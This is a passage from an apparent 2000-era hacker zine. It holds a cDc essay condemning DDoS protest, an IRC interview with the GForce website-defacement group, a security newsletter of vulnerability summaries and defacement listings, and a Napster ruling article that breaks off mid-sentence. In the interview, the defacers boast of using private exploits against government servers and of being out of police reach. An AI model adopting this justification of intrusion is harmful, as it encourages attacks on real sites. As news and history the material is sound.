     anticorporate. Like many people, the Electrohippies have been confused by
     technology. They are trying to filter their agenda through the Internet rather
     than focussing on first principles.

     The Electrohippies further compound their misunderstanding of the Internet by
     assuming that the same rules hold in the digital realm as they do down on the
     street. They do not. Where a large physical mass is the currency of protest on
     the street, or at the ballot box, it is an irrelevancy on the Internet. Or more
     correctly, it is not always necessary. Of course many people can make a
     difference on the Internet if one is talking about site traffic. High visitation
     boosts domain value; conversely its absence will decrease it. But to think that
     it takes a lot of people to execute an act of civil disobedience on the Internet is
     naiive. Programs make a difference, not people.

     And and as a last thought, I know from personal experience that there is a
     difference between street and on-line protest. I have been chased down the
     street by a baton-wielding police officer on horseback. Believe me, it takes a
     lot less courage to sit in front of a computer.

     "the difference between the two actions [DDoS packet wanking and the
     WTO on-line protests in which the Electrohippies participated] is the one of
     poplular legitimacy versus individual will. The structure of the client-side
     distributed actions developed by the electrohippies means that there must be
     widespread support across a country, or continent in order to make the
     system work. Our method has built within it the guarantee of democratic
     accountability".

     The Electrohippies are laboring under several false assumptions here. They
     believe that there is some nexus between their on-line actions against the
     WTO and the DDoS attacks against Yahoo, et al  there is not. And they think
     that somehow if many people perpetrate a DoS attack as opposed to just one,
     then that is, ethically speaking, a better thing. Bollocks.

     Denial of Service, is Denial of Service, is Denial of Service, period. The only
     difference between a program like Stacheldraht [a DDoS application written by
     The Mixter] and the client side javascript program written by the Electrohippies
     is the difference between blowing something up and being pecked to death by
     a duck. And if numbers lend legitimacy - as the Electrohippies propose - then
     the lone bomber who tried to assassinate Hitler in his bunker was wrong and
     the millions who supported the dictator were right.

     If the Electohippies wish to take actions that involve large groups then they
     should leverage their supporters against their targets in more practical ways.
     For instance.

     Lets say the Electrohippies take exception to the business practice of a large
     transnational that exploits child labour in developing countries. And let's say
     that this same transnational has an e-commerce enabled Web site selling its
     merchandise. So if the Electrohippies were to organize fifty thousand people to
     make a purchase from said Web site, then return the item with a letter of
     protest and a demand for a refund, then they might lodge a protest with the
     transnational that it would seek to remedy. This particular suggestion would
     have to be tweaked according to the target but it makes the point. Creating an
     intolerable snag in running a business is a far more productive use of protest
     action than disabling a Web server for a short time, the ethics of such
     notwithstanding.

     "the electrohippies collective believe that the acts or views perpetrated by the
     targets of a DoS action must be reprehensible to many in society at large, and
     not just to a small group. It is on this basis that the collective undertook the
     action against the WTO during their conference in Seattle, and it is also the
     basis upon which we are planning future actions".

     Denial of Service attacks are a violation of the First Amendment, and of the
     freedoms of expression and assembly. No rationale, even in the service of the
     highest ideals, makes them anything other than what they are -- illegal,
     unethical, and uncivil. One does not make a better point in a public forum by
     shouting down ones opponent. Say something more intelligent or observe your
     opponents' technology and leverage your assets against them in creative and
     legal ways. 

     Hacktivism is about using more eloquent arguments  whether of code or
     words  to construct a more perfect system. One does not become a
     hacktivist merely by inserting an "h" in front of the word activist or by looking
     backward to paradigms associated with industrial organization.

     One does so by living in the present and recognizing reality. We live in a
     post-Newtonian universe although too many people are unaware of this. 

     There is still talk of left and right, of a centre to the margins sensibility. This
     world was blown apart by Einstein. The universe is no longer explosive, it is
     implosive. And to take part in social and political discussions one most move
     inward to the centre rather than outward to the extremes. Being a centrist is
     the new reality; everything else is reactionary.

     While the Electrohippies cannot be faulted for their dedication and good
     intentions, we all know how the road to hell is paved. And if the they are as
     dedicated to the Scriptures as they appear to be, then let them ponder this.

     The fear of the LORD is the beginning of knowledge: but fools despise wisdom
     and instruction.
     -- Proverbs, I v7.

     I dont think that the Electrohippies are fools.


     --
     oxblood ruffin!cDc
     foreign minister
     "cDc. We put the hack into hacktivism"
                                                                      
     @HWA                    
     
     
299.0 [IND] Hacktivism: GForce using website defacements to spread their word
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      You have seen the high profile sites on Attrition that have been
      defaced by GForce, SugarKing from HWA Staff interviews GForce
      members for a closer look into why they do it.
      
      (c)2000 SugarKing/HWA.hax0r.news
       if reprinted please include the source
       http://welcome.to/HWA.hax0r.news
       
      [20:59] <sniper-> SugarKing: So we can start the interview ;)
      [20:59] <sniper-> sure
      [20:59] <SugarKing> alright, is this everyone you want present?
      [21:00] <sniper-> yes, most of other guy's arn't on, some are busy, and it's very early here.
      [21:00] <SugarKing> yeah
      [21:01] <SugarKing> ok, you don't have to answer any question if you don't want to...
      [21:01] <sniper-> ok
      [21:02] <SugarKing> so lets begin:)
      [21:02] <sniper-> yep
      [21:02] <SugarKing> ok first off, how many members are there, and who are they?
      [21:03] *** sniper- is now known as sniper__
      [21:03] <rave-> ehehe
      [21:03] <SugarKing> heh
      [21:03] <rave-> services sux
      [21:03] <sniper__> There are about 5 members, they are myself, miller, rave-, heataz, and instinct atm
      [21:03] <SugarKing> ok
      [21:04] <SugarKing> when was the group founded and by who?
      [21:04] <sniper__> It's was founded about a year ago, and by myself, heataz and miller
      [21:05] <SugarKing> what was your sole purpose of starting the group? for the reasons you name in your defacments?
      [21:06] <sniper__> GForce was born out of hate and contempt for violence, atrocities and human rights violations against Muslims, specially the affectees in Kashmir
      [21:06] <sniper__> t was precipitated to bring the attention of world leaders and organizations to the issue in cyberspace which is today the leading source of communication. The motive behind the formation of the group was to create global awareness about kashmir.
      [21:06] <SugarKing> which members are actually from Pakistan?
      [21:07] <SugarKing> if any
      [21:07] <sniper__> we focus on kashmir, basically.
      [21:07] <SugarKing> so nobody is actually from kashmir?
      [21:07] <sniper__> well i`m from pakistan, othger's would like to stay anonymous please.
      [21:08] <sniper__> well no one if from kashmir.
      [21:08] <SugarKing> sure, np
      [21:08] <sniper__> =)
      [21:08] <SugarKing> some of your defacements are gov servers, any reason of targeting gov's, are you afraid to get busted?
      [21:09] <sniper__> Not really, We are not afraid to get busted for the reason that it's a good cause, secondly members are out of the feds reach ;)
      [21:10] <SugarKing> yeah of course
      [21:11] <SugarKing> you are one of, if not the only, people on attrition that I've seen that actually have a REASON
      [21:11] <SugarKing> instead of just "I 0wn j00"
      [21:11] <rave-> :)
      [21:11] *** snipah- (**************) has joined #gforce
      [21:11] <snipah-> sory i got disconnected.
      [21:11] <snipah-> US government was targetted because 1) more people view .gov's and we can do a good job in achieving th goal, we are out for. 2) We're a big angry :)
      [21:12] <snipah-> big=bit
      [21:12] *** sp1n sets mode: +o snipah-
      [21:12] <SugarKing> and it seems like you guys got some skill, seeing you don't really do any NT hacks
      [21:12] *** rpcb1nd (***************) has joined #gforce
      [21:12] *** sk0l (*****************) has joined #gforce
      [21:12] *** sp1n sets mode: +o rpcb1nd
      [21:12] *** sp1n sets mode: +o sk0l
      [21:13] <snipah-> i`m glad we don't do NT,
      [21:13] <snipah-> we are supported by a study group known as hexa labs
      [21:13] <SugarKing> what is hexa labs
      [21:13] <SugarKing> ?
      [21:13] <snipah-> Plus every member can code (usefully)
      [21:14] <snipah-> hexa labs is a study group, they find out vulnerabilities, code them (we help code)
      [21:14] <snipah-> most of it is being kept private.
      [21:14] *** sniper__ has quit IRC (Ping timeout)
      [21:14] <SugarKing> you guys ever use your own exploits when using them on defacing?
      [21:15] *** sk0l sets mode: +l 14
      [21:16] [rave-:#gforce PING]
      [21:16] <rave-> ehhe
      [21:16] <rave-> alot of times we use own exploitz
      [21:16] <SugarKing> heh
      [21:17] <rave-> sometimes we use a wuftp (b0f rulz) and bind.. but no details
      [21:17] <SugarKing> yeah b0f rules
      [21:17] <rave-> :)
      [21:17] <rave-> :)
      [21:17] <SugarKing> what do you guys think about ./hack kiddies on attrition like the Crime Boys?
      [21:18] *** snipah- has quit IRC (Ping timeout)
      [21:18] <rave-> oh
      [21:18] <rave-> we dont apreciate it, we think about just kids who dont know what to do.
      [21:19] <rave-> who thinks about computer hacking/security is just get proggies from others dudes and exploit of Dos something
      [21:19] <rave-> we think about computer security is a big culture and need to dedicate to it, studys, tests, and fucking blowing head
      [21:19] <rave-> eheh
      [21:20] <rave-> crimeboys is very poor
      [21:20] <rave-> NT hackewrs
      [21:20] <SugarKing> yeah I agree
      [21:20] <SugarKing> are most of you guys teengagers?
      [21:21] <rave-> i dunno about sniper but i have 20 yrs old
      [21:22] *** sniper__ (***************) has joined #gforce
      [21:22] <SugarKing> wb
      [21:22] *** rave- sets mode: +o sniper__
      [21:22] <sniper__> thx
      [21:22] <SugarKing> so why do you think India is solely responisible for this ordeal in Kashmir?
      [21:24] *** rpcb1nd sets mode: +l 13
      [21:24] <sniper__> because they are, 1) they are pretty lame as they don't wana listen to any one, the people want freedom but India won't let them to add to all this they rape innocent women, small children get murdered, made orphans. and they violate human rights
      [21:25] *** sp1n sets mode: +l 14
      [21:26] <SugarKing> nod
      [21:26] <SugarKing> pretty violent
      [21:27] <sniper__> yep.
      [21:27] <SugarKing> you guys plan on keep defacing and protesting till someone gets busted?
      [21:28] <sniper__> not sure, but yes we will be defacing for some while. ;)
      [21:28] <SugarKing> what do plan on accomplishing by defacing on this issue?
      [21:29] <SugarKing> to get people to realize the situation ?
      [21:29] <sniper__> yep, create global awareness, on many occasions people have asked us if kashmir is some one like kevin mitnick =)
      [21:30] <sniper__> obviously they 'kashmir' is some guy
      [21:30] <SugarKing> hahah
      [21:31] <sniper__> they thought even.
      [21:31] <SugarKing> any last comments/shout outs?:)
      [21:32] <sniper__> =]
      [21:33] <sniper__> yes
      [21:34] <SugarKing> shoot:)\
      [21:35] <sniper__> I`d like to thank mos (muslim online syndicates) for what ever they have done, Pakistan Hackers club, hexa labs for coding, attrition, munge, punkis, null, mcintyres, jerisho for fast mirroring, zillion@safemode , rr, cen, and all in @linuxsex
      [21:35] <sniper__> oh and #darknet@efnet ;)
      [21:36] <sniper__> last shouts to hwa security ;)
      [21:37] <SugarKing> hah nice, thanks for the interview:)
      [21:37] <sniper__> ah, np
      [21:39] [rave-:#gforce PING]
      
      
      @HWA

300.0 [HNS] Help Net Security News Letter #20
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://net-security.org/
      
      Net-Sec newsletter
      Issue 20 - 03.07.2000
      http://net-security.org
      
      Net-Sec is a newsletter delivered to you by Help Net Security. It covers weekly 
      roundups of security events that were in the news the past week. 
      Visit Help Net Security for the latest security news - http://www.net-security.org.
      
      
      Subscribe to this weekly digest on:
      http://www.net-security.org/text/newsletter
      
      Table of contents:
      
      1) General security news
      2) Security issues
      3) Security world
      4) Defaced archives
      
      
      
      General security news
      ---------------------
      
      
      ----------------------------------------------------------------------------
      
      SECURITY CHECKS CRASH ROUTERS
      Red-faced networking giant Cisco has been forced to warn customers that its 
      routers can crash when tested for security vulnerabilities by security scanning 
      software programs.
      Link: http://www.vnunet.com/News/1104718
      
      
      SECURE MESSAGING
      Critical Path detailed a suite of secure messaging services designed to help 
      enterprises protect information assets such as engineering drawings, financial 
      documents, and legal agreements transferred over the Internet.
      Link: http://www.infoworld.com/articles/hn/xml/00/06/26/000626hncritical.xml
      
      
      UK BACKS OFF AWAY FROM RIP BILL
      CNN reports that the U.K. government is backing away from some of the more 
      controversial aspects of its e-mail surveillance bill (Regulation of Investigatory 
      Powers - RIP) currently under consideration in the House of Lords.
      Link: http://www.cnn.com/2000/TECH/computing/06/26/cybersnoop.idg/index.html
      
      
      CRACKED! PART 6: TELKING WITH THE ENEMY
      "Soon after rebuilding the system I started talking to someone on IRC that 
      identified themselves as the person that had cracked our system. He was 
      connecting from the same places that the cracker had been coming from and 
      seemed to know things that only the cracker would have known, so I decided 
      to take him at face value. Over the first couple of weeks we talked about a 
      variety of subjects. I have selected some of the most interesting bits and 
      grouped them together to give an idea of the flavor of the conversations. It 
      was an interesting window into the mind of someone living a very different life."
      Link: http://www.rootprompt.org/article.php3?article=588
      
      
      SCENES FROM THE "HACKERS" HOOD
      "The impression that most people fail to get from regular attacks is how trivial 
      they are," said Elias Levy, chief technology officer of SecurityFocus.com. 
      "These people tend to choose their targets pretty much at random - or 
      whoever bothers them that day, or pisses them off." 
      Link: http://www.wired.com/news/culture/0,1284,37238,00.html
      
      
      VIRUS SCAN FOR HANDHELDS
      It looks like McAfee is now offering virus scanning software for handheld 
      computers. Altought there are no viruses for handhelds, there is an option 
      to infect when you sync your handheld and your PC. Contributed by Brian.
      Link: http://www.mcafee.com/wireless/handscan/default.asp?
      
      
      MATTEL AND PRIVACY
      In response to public complaints about privacy, Mattel Interactive announced 
      that the company would provide a tool that removes software that was 
      surreptitiously placed on customers' computers and is designed to transmit 
      and receive information to Mattel.
      Link: http://abcnews.go.com/sections/business/DailyNews/mattel000624.html
      
      
      BANK DETAILS SNATCHED
      A man calling himself 'Kelly' rang ABC radio station 2BL claiming he had 
      accessed company details from the GST information site www.gstassist.gov.au, 
      which contains the details of about 27,000 businesses. According to ZDnet AU, 
      he said that he he simply used a inserted numbers between 1 and 27,000 into 
      a CGI output and it retrieved records. Contributed by Apocalyse Dow.
      Link: http://www.zdnet.com.au/zdnn/stories/zdnn_display/au0003700.html
      
      
      NIKE HIJACKING, PART II
      Nike.com hijacking received a sequel - when Nike's website was hijacked last 
      week, traffic was redirected through one man's Web servers in the U.K., 
      bogging them down and costing his Web hosting company time and money 
      (at least he says so). Now he is suing Nike and he created "Shame on Nike" 
      web site.
      Link: http://www.wired.com/news/politics/0,1283,37286,00.html
      Link: http://www.shameonnike.com/
      
      
      LOVE LETTER CREATOR CHARGED
      Onel de Guzman is charged for writting the Love Letter worm. The National 
      Bureau of Investigation will charge de Guzman "traditional" crimes such as 
      theft and violation of a law that normally covers credit card fraud. If 
      charged maximum penalty of 20 years in prison. 
      
      
      COMPUTER ASSOCIATES REBUFFS SOPHOS ALLEGATIONS
      Simon Perry, Computer Associates' vice president, told Newsbytes that he 
      viewed Sophos' comments as irrelevant, adding that the approach his firm 
      takes with warnings customers about viruses is to warn them of any potential 
      problems, for whatever reason. "Our reporting of viruses to our customers 
      has drawn kudos, both from customers and the industry at large," he said, 
      adding that the company aims to quickly let people know what the latest 
      virus is and what the associated dangers are.
      Link: http://www.computeruser.com/news/00/06/30/news19.html
      
      
      STUDENT ADMITS GOVERNMENT ATTACKS
      A university student admitted in Boston federal court to breaking into U.S. 
      government computers including Defense Department and NASA systems. 
      Ikenna Iffih, a student at Northeastern University's College of Computer 
      Science, pleaded guilty to a series of coast-to-coast cyber attacks before 
      U.S. District Judge Robert Keeton late on Thursday. 
      Link: http://www.wired.com/news/politics/0,1283,37352,00.html
      
      
      SEGA DREAMCAST COPYRIGHT PROTECTION BROKEN
      The Dreamcast game system has been viewed as one of the most secure 
      digital entertainment systems on the market. It looks like it is not so 
      secure. Group called Utopia has broken through copyright protections 
      of the system. 
      Link: http://news.cnet.com/news/0-1005-200-2181596.html?tag=st.ne.1005.sndstry.ni
      
      
      LEE ASHURT'S POINT OF VIEW
      Lee Ashurst accused of hacking into and sabotaging the Internet service 
      Etisalat, has filed a defamation suit in Dubai against them. He has also 
      set up a site with his opinion on the whole situation.
      Link: http://www.supportlee.4mg.com/
      
      
      ISSUE DISCLOSURE POLICY
      Lewis Z. Koch did an article on Rain Forrest Puppy's "issue disclosure policy", 
      a text dealing with reporting vulnerabilities to vendors. First version of this 
      text file was sent to Bugtraq approximately 3 weeks ago.
      Link: http://mcafee.snap.com/main/page/pcp/cd/0,85,-1716-1431464-397786,00.html
      
      
      ----------------------------------------------------------------------------
      
      
      
      Security issues
      ---------------
      
      All vulnerabilities are located at:
      http://net-security.org/text/bugs
      
      
      ----------------------------------------------------------------------------
      
      IE 5 AND EXCEL 2000, POWERPOINT 2000 VULNERABILITY
      Internet Explorer 5.01, Excel 2000 and PowerPoint under Windows 98 (suppose 
      other versions are also vulnerable, have not tested) allow executing programs 
      when viewing a web page or HTML email message - in the latter case at least 
      with IFRAME. This allows taking full control over user's computer. 
      Link: http://www.net-security.org/text/bugs/962198313,44285,.shtml
      
      
      IE 5 AND ACCESS 2000 VULNERABILITY
      Internet Explorer 5.01 and Access 2000 under Windows 98 (suppose other 
      versions are also vulnerable) allow executing programs when viewing a web 
      page or HTML email message - (in the latter case with IFRAME). This allows 
      taking full control over user's computer. 
      Link: http://www.net-security.org/text/bugs/962198423,71032,.shtml
      
      
      PATCH FOR "ACTIVE SETUP DOWNLOAD" PROBLEM
      Microsoft has released a patch that eliminates a security vulnerability in an 
      ActiveX control that ships with Microsoft Internet Explorer. The vulnerability 
      could be used to overwrite files on the computer of a user who visited a 
      malicious web site operator's site.
      Link: http://www.net-security.org/text/bugs/962463758,19962,.shtml
      
      
      DOS IN MICROSOFT WINDOWS 2000 SERVER
      Multiple ports and protocols on Microsoft Windows 2000 Server are 
      susceptible to a simple network attack which raises CPU utilization on 
      Windows 2000 Server to 100%. 
      Link: http://www.net-security.org/text/bugs/962540960,71332,.shtml
      
      
      DOS IN CHECK POINT FIREWALL-1 ON WINDOWS NT
      The SMTP Security Server component of Check Point Firewall-1 4.0 and 
      4.1 is vulnerable to a simple network-based attack which raises the 
      firewall load to 100%. 
      Link: http://www.net-security.org/text/bugs/962541047,22517,.shtml
      
      
      DOS IN MICROSOFT WINDOWS 2000 TELNET SERVER
      Microsoft Windows 2000 Server is supplied with a Telnet server for remote 
      console access. A Denial of Service vulnerability exists in this server which 
      may be exploited by a local or remote attacker. 
      Link: http://www.net-security.org/text/bugs/962541114,23868,.shtml
      
      
      BOA WEBSERVER LOCAL PATH PROBLEM
      BOA Webserver is a small fast webserver that supports only basic functions. 
      It beats the pants off of apache for speed however, the only problem is that 
      it does not do any URL parsing. It admits this (somewhere on the page it says 
      you better lock down your file system real good), but the problem still remains. 
      Basically you can specify the full local path to any file on a Boa webserver and 
      out it spits the contents. i.e.
      Link: http://www.net-security.org/text/bugs/962541273,5729,.shtml
      
      
      [MANDRAKE] WU-FTPD UPDATE
      Wu-ftpd is vulnerable to a very serious remote attack in the SITE EXEC 
      implementation. Because of user input going directly into a format string for 
      a *printf function, it is possible to overwrite important data, such as a return 
      address, on the stack.
      Link: http://www.net-security.org/text/bugs/962578199,96510,.shtml
      
      
      [MANDRAKE] - DHCP UPDATE
      The OpenBSD team discovered a vulnerability in it that allows for remote 
      exploitation by a corrupt dhcp server, (or an attacker pretending to be a dhcp 
      server). If this vulnerability is exploited, root access can be gained on the host 
      running dhcp client remotely. The problem is that input is not checked and, as 
      a result, it is possible to execute commands remotely when the network config 
      files are being written on the dhcp client.
      Link: http://www.net-security.org/text/bugs/962578323,92268,.shtml
      
      
      ----------------------------------------------------------------------------
      
      
      
      Security world
      --------------
      
      All press releases are located at:
      http://net-security.org/text/press
      
      ----------------------------------------------------------------------------
      
      CENTRAL COMMAND ANNOUNCES PERFECTSUPPORT - [26.06.2000]
      Today Central Command announced PerfectSupport, a new support service that 
      provides mission critical antivirus support and services. This subscription service 
      provides maximum virus protection to all organizations where virus prevention, 
      and malicious application recovery is critical to their operation. This premium 
      service includes unlimited toll-free phone support at any time and priority access 
      to Central Command's Emergency Virus Response Team during virus outbreaks. 
      
      Press release:
      < http://www.net-security.org/text/press/962040421,209,.shtml >
      
      ----------------------------------------------------------------------------
      
      eWEEK CHALLENGES PUBLIC TO HACK THEM - [27.06.2000]
      In its second major test of Web enterprise security, Labs Interactive, by the 
      editors of eWEEK, in conjunction with digital security services firm Guardent, has 
      created an e-commerce site and is challenging the public to hack the site at 
      openhack.com. Prize money of up to $2,500 will be awarded to the first hacker to 
      crack the site which mimics a true corporate e-commerce network, including e-mail, 
      Web server, a database application, remote access and five different operating 
      systems. The challenge goes live on June 26 and runs through the first two weeks 
      of July. 
      
      Press release:
      < http://www.net-security.org/text/press/962098245,92659,.shtml >
      
      ----------------------------------------------------------------------------
      
      GENUITY ANNOUNCES ENHANCED FIREWALL SERVICES - [27.06.2000]
      Genuity Inc., formerly GTE Internetworking, today announced significant new 
      enhancements to the Site Patrol for FireWall-1 family of managed Internet 
      security services. Designed to secure high-volume enterprise intranets and 
      e-business extranets, new leading-edge features include the industry's first High 
      Availability managed firewall service. Site Patrol uses StoneSoft Corporation's 
      award-winning StoneBeat clustering technology with dynamic load balancing to 
      ensure maximum availability, scalability and performance. In addition, a hot 
      standby, High Availability option is also available for organizations with fixed 
      throughput requirements.
      
      Press release:
      < http://www.net-security.org/text/press/962098361,38122,.shtml >
      
      ----------------------------------------------------------------------------
      
      SECOND ANNUAL GLOBAL E-SECURITY CONVENTION - [28.06.2000]
      Baltimore Technologies, a global leader in e-security solutions, today announced 
      the company's second annual Global e-Security Convention, focusing on the use 
      of e-security to deliver secure, trusted business models and applications. Global 
      e-Security 2000 is the most authoritative convention set up to educate delegates 
      on the business and technology benefits of e-security. This convention will 
      highlight PKI technology as an integral component of secure e-business with the 
      ability to unleash endless opportunities for companies worldwide.
      
      Press release:
      < http://www.net-security.org/text/press/962198599,45835,.shtml >
      
      ----------------------------------------------------------------------------
      
      CA ANNOUNCES ETRUST SINGLE SIGN-ON 6.5 - [28.06.2000]
      Computer Associates International, Inc., the world's leading eBusiness solutions 
      provider, today announced the general availability (GA) of eTrust Single Sign-On 
      (SSO) 6.5, the industry-leading secured access solution. The latest version of 
      eTrust SSO provides a comprehensive solution for eBusinesses desiring integrated 
      SSO and access control capabilities for existing client/server and Web-based 
      applications from a single product. 
      
      Press release:
      < http://www.net-security.org/text/press/962198695,70218,.shtml >
      
      ----------------------------------------------------------------------------
      
      CYLINK ANNOUNCES GENERAL EELEASE OF NETHAWK - [29.06.2000]
      On June 23, Cylink Corporation began customer shipments of its NetHawk, the 
      company's new high-speed virtual private network (VPN) appliance for secure, 
      site-to-site Internet communications. NetHawk is an Internet Protocol Security 
      (IPSec) solution that transparently integrates into the network, providing an 
      enterprise-strength combination of performance and manageability.
      
      Press release:
      < http://www.net-security.org/text/press/962275562,59227,.shtml >
      
      ----------------------------------------------------------------------------
      
      FREE LINUX FIREWALL RELEASED TO PUBLIC - [01.07.2000]
      NetMaster Networking Solutions, Inc. of Chilliwack, B.C., announced today they 
      are making their Gateway Guardian Personal Edition firewall software available 
      FREE for personal and non-profit use. It can be downloaded off their web site, 
      www.GatewayGuardian.com, and also from over 100 download sites across the 
      Internet. "We have done this to meet the increasing demand for firewall protection 
      from families adopting high-speed cable, and DSL internet connections across 
      Canada and the U.S.," said Steve Hemenway, NetMaster's Vice President of Sales 
      and Marketing. 
      
      Press release:
      < http://www.net-security.org/text/press/962464441,94200,.shtml >
      
      ----------------------------------------------------------------------------
      
      INTERPOL AND ATOMICTANGERINE ANNOUNCE ALLIANCE - [01.07.2000]
      Companies worldwide will have new access to superior intelligence in their war 
      against global cyber crime as a result of an innovative alliance between the 
      private and public sector. Working directly with Menlo Park-based venture 
      consulting powerhouse AtomicTangerine, famous Lyon, France-based Interpol has 
      initiated a special relationship designed to deliver advanced intelligence collected 
      by the law enforcement organization to corporations worldwide. Interpol is the 
      world's pre-eminent organization supporting the prevention and detection of 
      international crime. 
      
      Press release:
      < http://www.net-security.org/text/press/962550257,75895,.shtml >
      
      ----------------------------------------------------------------------------
      
      
      
      Defaced archives
      ------------------------
      
      [25.06.2000] - Washington State Department of Social and Health Services
      Original: http://maa.dshs.wa.gov/
      Defaced: http://www.attrition.org/mirror/attrition/2000/06/25/maa.dshs.wa.gov/
      
      [26.06.2000] - Epson
      Original: http://www.epson.com.cn/
      Defaced: http://www.attrition.org/mirror/attrition/2000/06/26/www.epson.com.cn/
      
      [27.06.2000] - London Fire Brigade
      Original: http://www.londonfirebrigade.gov.uk/
      Defaced: http://www.attrition.org/mirror/attrition/2000/06/27/londonfirebrigade.gov.uk/
      
      [27.06.2000] - Counterpart Consortium Turkmenistan
      Original: http://www.cpart.org
      Defaced: http://www.attrition.org/mirror/attrition/2000/06/27/www.cpart.org/
      
      [28.06.2000] - LSU School of Social Work
      Original: http://www.socialwork.lsu.edu/
      Defaced: http://www.attrition.org/mirror/attrition/2000/06/28/www.socialwork.lsu.edu/
      
      [29.06.2000] - The Bloodhound Gang Online
      Original: http://www.bloodhoundgang.com/
      Defaced: http://www.attrition.org/mirror/attrition/2000/06/29/www.bloodhoundgang.com/
      
      [29.06.2000] - HyperHog Internet Service
      Original: http://www.hyperhog.net/
      Defaced: http://www.attrition.org/mirror/attrition/2000/06/29/www.hyperhog.net/
      
      [30.06.2000] - Banco Union Colombiano
      Original: http://www.bancounion.com.co/
      Defaced: http://www.attrition.org/mirror/attrition/2000/06/30/www.bancounion.com.co/
      
      [30.06.2000] - Philippine Association for Open Computing
      Original: http://www.passoc.org/
      Defaced: http://www.attrition.org/mirror/attrition/2000/06/30/www.passoc.org/
      
      [30.06.2000] - The Undersecretariat of Foreign Trade Turkey
      Original: http://www.foreigntrade.gov.tr/
      Defaced: http://www.attrition.org/mirror/attrition/2000/06/30/www.foreigntrade.gov..tr/
      
      [01.07.2000] - White Force
      Original: http://www.whiteforce.com/
      Defaced: http://www.attrition.org/mirror/attrition/2000/07/01/www.whiteforce.com/
      
      [01.07.2000] - College of New Caledonia
      Original: http://www.cnc.bc.ca/
      Defaced: http://www.attrition.org/mirror/attrition/2000/07/01/www.cnc.bc.ca/
      
      
      
      HNS staff
      staff@net-security.org
      http://net-security.org
      
      
      ---------------------------------------------------------------------
      To unsubscribe, e-mail: news-unsubscribe@net-security.org
      For additional commands, e-mail: news-help@net-security.org
      
      @HWA      
     

301.0 [MM] NAPSTER GETS ORDERED TO BE SHUT DOWN IS THE FIGHT LOST?
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Sources: Mutiple
      
      ZDMet Article:      
      Judge slams door on Napster

      Thu, 27 Jul 2000 08:56:41 GMT
      Lisa M. Bowman
     
     
      US district judge Marilyn Hall Patel showed little sympathy
      for the popular song-swap site, saying it was encouraging
      piracy by millions of users 
     
      A federal judge on Wednesday issued a surprise injunction requiring
      Napster to block all copyrighted music on its site. The injunction will
      go into effect midnight Friday, local time. The recording industry
      must pay a $5m bond against any financial losses Napster might
      suffer by being shut down pending trial. 
     
      Saying the recording industry is likely to prevail in its copyright
      infringement case against the popular song-sharing company, US
      district judge Marilyn Patel's ruling could, in effect, shut down the
      free music swapping service. Patel ruled unexpectedly from the
      bench immediately after a two-hour hearing, telling a packed
      courtroom her order would keep Napster from "copying or assisting
      or enabling or contributing to the copy or duplication of all
      copyrighted songs and musical compositions of which the plaintiffs
      hold rights". 
     
      The Recording Industry Association of America filed a lawsuit in
      December, just five months after Napster's launch, saying the
      company's song-sharing service promotes copyright infringement.
      The case is scheduled for trial later this year. 
     
      Patel denied a motion by Napster attorney David Boies, which
      asked her to delay the order. Outside the courtroom, Boies vowed
      an appeal and, separately, Napster executives said the company
      would file papers Thursday morning. 
     
      Boies said the order was "impossible to implement or obey" since
      Napster has not received a list of songs it is required to block. 
     
      And, while Patel's order stopped short of pulling the plug, Boies said
      the injunction could cripple the business. 
     
      "Between now and the actual trial, Napster's service obviously is
      going to be seriously curtailed [if the injunction isn't lifted]" , Boies
      said, adding that a settlement, though possible, was unlikely. 
     
      RIAA general counsel Cary Sherman applauded the order, saying
      that it laid the groundwork for legal music downloads and that it
      could send a message to other song-swapping firms. 
     
      In issuing the order, Patel denied virtually every defence claim by
      Napster. The RIAA recently sued another file sharing company,
      Scour, on similar grounds. "Our hope is that the court's decision,
      which is very, very clear, and very, very strong, will send a very
      clear signal to all those other companies," Sherman said. 
     
      She said swapping songs with Napster wasn't protected under the
      Audio Home Recording Act, as the defence had argued, in part
      because it involved so many people. She added that evidence so far
      in the case, including internal Napster memos, had convinced her
      that most people used the service primarily to download copyrighted
      materials. 
     
      Patel bought the recording industry's argument that Napster resisted
      complying with federal law by failing to pay royalties to copyright
      owners. 
     
      Recording industry attorney Russell Frackman told the judge that 20
      million songs were downloaded daily, of which roughly 90 percent
      were copyrighted. He said that Napster planned to have a user base
      of 75 million users by the end of the year. 
     
      "The record companies not only get no return on their investment,
      but Napster is piggy-backing," Frackman said, adding that reining in
      the company would only become more difficult in the future. "The
      longer this goes on, your honour, the more impossible it will be for us
      and the court to do anything realistic," he continued, asking her to
      "nip this in the bud". 
     
      He also said studies showing that CD sales were rising even as
      Napster gained momentum were "weak" and "irrelevant". 
     
      At some points Patel was clearly irritated at Napster attorneys,
      challenging many of their assertions and asking them many more
      questions than she had asked the recording industry attorneys. 
     
      After reading internal Napster planning documents related to the
      case. "Pirating be damned is pretty much the sense one gets," she
      said. "Free music for the people!" she quipped, prompting chuckles
      in the courtroom. Later, Patel abruptly ended Napster's presentation
      after an exasperated Napster attorney, Daniel Johnson, told her
      "you're not listening". 
     
      "You may have a seat," Patel shot back. And he did. 
     
      After her ruling, Patel gave both sides a chance to respond. Boies
      asked Patel directly if she intended to close Napster down. 
     
      "I'm not ordering them to shut their business down. I want to make
      that clear," Patel said. 
     
      During the hearing, Patel seemed not to understand that Napster
      was not the only site that allowed users to download free music.
      When Napster attorneys pointed out that people could swap songs
      through other -- though decidedly less popular -- means, such as
      chat rooms and Gnutella, Patel challenged them, saying "but you
      have to pay". 
     
      At one point, Patel asked Johnson, "What about Gnutella, do you
      have to pay?" 
     
      Johnson told her she did not. 
     
      On Wednesday evening, company founder Shawn Fanning and
      chief exec Hank Barry held a brief Webcast to address user
      concerns. 
     
      "We will keep fighting for Napster and your right to share music
      over the Internet," Fanning said. Barry said the company would
      work through the night on a solution to an injunction he said could
      shut the service down in its current form. "Although we sharply and
      firmly disagree with the judge's decision, we understand the basis
      for it and we plan to comply." 
     
      David Coursey reckons at the end of the day, history will
      judge that Napster wasn't an advocate of "the Internet
      should be free" but a greedy bunch of corporate raiders
      trying to make their fortune off the property of others.
      
      HWA Says;
     
      "Fuck him and the horse he rode in on", I have as a result of
      exposure to material I otherwise would not have been able to sample
      have purchased MORE cd's than I previously did.
      
      A true fan wants a piece of their idol, that includes the crappy
